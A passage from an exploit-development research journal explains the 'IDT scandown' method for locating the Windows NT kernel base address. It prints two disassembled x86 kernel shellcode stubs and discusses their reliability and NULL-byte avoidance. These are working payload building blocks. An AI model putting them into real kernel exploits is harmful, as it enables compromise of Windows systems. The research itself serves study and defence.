Uninformed: Informative Information for the Uninformed

Vol 3» 2006.Jan

IDT Scandown

Size: 17 bytes
Compat: All
Credit: eEye

The approach for finding the base address of nt discussed in eEye's paper involved finding the high-order word of an IDT handler that was set to a symbol somewhere inside nt. After acquiring the symbol address, the payload simply walked down toward lower addresses in memory byte-by-byte until it found the MZ checksum. The following disassembly shows the approach taken to do this[2]:

00000000  8B3538F0DFFF      mov esi,[0xffdff038]
00000006  AD                lodsd
00000007  AD                lodsd
00000008  48                dec eax
00000009  81384D5A9000      cmp dword [eax],0x905a4d
0000000F  75F7              jnz 0x8
This approach is perfectly fine, however, it could be prone to error if the four checksum bytes were found somewhere within nt which did not actually coincide with its base address. This issue is one that is present to any scandown technique (referred to as ``mid-deltas'' by eEye). However, scanning down byte-by-byte can be seen as potentially more error prone, but this is purely conjecture at this point as the authors are aware of no specific cases in which it would fail. It may also fail if the direction flag is not cleared, though the chances of this happening are minimal. One other limiting factor may be the presence of the NULL byte in the comparison. It is possible to slightly improve (depending upon which perspective one is looking at it from) this approach by scanning downward one page at a time and by eliminating the need to clear the direction flag3.2. This also eliminates the presence of NULL bytes. However, some of these changes lead to the code being slightly larger (20 bytes total):
00000000  6A38              push byte +0x38
00000002  5B                pop ebx
00000003  648B03            mov eax,[fs:ebx]
00000006  8B4004            mov eax,[eax+0x4]
00000009  662501F0          and ax,0xf001
0000000D  48                dec eax
0000000E  6681384D5A        cmp word [eax],0x5a4d
00000013  75F4              jnz 0x9